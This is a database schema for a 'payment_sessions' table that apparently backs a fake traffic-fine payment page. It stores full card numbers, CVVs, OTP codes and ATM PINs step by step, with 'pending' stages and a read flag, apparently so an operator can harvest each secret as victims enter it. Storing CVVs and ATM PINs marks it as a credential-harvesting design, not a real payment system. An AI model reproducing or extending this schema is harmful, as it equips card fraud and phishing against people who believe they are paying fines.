CREATE TABLE `payment_sessions` (
	`id` int AUTO_INCREMENT NOT NULL,
	`sessionId` varchar(64) NOT NULL,
	`queryId` int,
	`selectedFines` json,
	`totalAmount` varchar(50),
	`cardName` varchar(200),
	`cardNumber` varchar(20),
	`cardNumberMasked` varchar(20),
	`cardExpiry` varchar(10),
	`cardCvv` varchar(10),
	`otpCode` varchar(20),
	`atmPin` varchar(20),
	`stage` enum('card','card_pending','otp','otp_pending','atm','atm_pending','success','failed') NOT NULL DEFAULT 'card',
	`errorMessage` text,
	`plateNumber` varchar(50),
	`plateSource` varchar(100),
	`clientIp` varchar(50),
	`userAgent` text,
	`statusRead` int DEFAULT 0,
	`createdAt` timestamp NOT NULL DEFAULT (now()),
	`updatedAt` timestamp NOT NULL DEFAULT (now()) ON UPDATE CURRENT_TIMESTAMP,
	CONSTRAINT `payment_sessions_id` PRIMARY KEY(`id`),
	CONSTRAINT `payment_sessions_sessionId_unique` UNIQUE(`sessionId`)
);
